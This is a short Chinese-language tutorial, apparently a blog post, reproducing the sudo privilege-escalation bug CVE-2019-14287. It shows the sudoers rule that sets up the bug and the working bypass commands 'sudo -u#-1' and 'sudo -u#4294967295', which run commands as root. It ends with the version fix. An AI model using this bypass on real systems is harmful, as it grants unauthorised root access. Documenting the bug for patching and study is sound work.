sudo是Linux系统命令,让普通账号以root身份去执行某些命令,比,安装软件、查看某些配置文件、关机、重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo使用权赋予该账号
sudo提权漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是:<1.8.28
漏洞复现过程
1、查看版本:sudo -V
2、修改配置文件:vim/etc/sudoers在root ALL=(ALL:ALL)ALL 下面添加一行配置:
test ALL=(ALL,!root) ALL,修改完配置文件后退出 :wq!
注意:需要创建test用户: useradd test passwd test
test ALL=(ALL,!root) ALL
test 表示test用户
第一个ALL表示该用户可以再任意地方可以使用sudo
第二个(ALL,!root)表示命令可以被除了root意外的任意用户执行
最后面的ALL表示被允许执行
整体:test用户可以使用sudo,但是除了root用户以外的任意用户去执行命令
3、切换到test用户,su test 然后sudo id(查看root的id),发现没有权限去执行
使用如下的方法执行我们想执行的命令:
sudo -u#数字 命令
其中数字范围=1~4294967295,命令是系统命令
如果以root身份去执行命令,数字使用-1和4294967295
修复方法:更新sudo版本>=1.8.28
总结:该漏洞比较鸡肋,需要管理员修改配置文件!!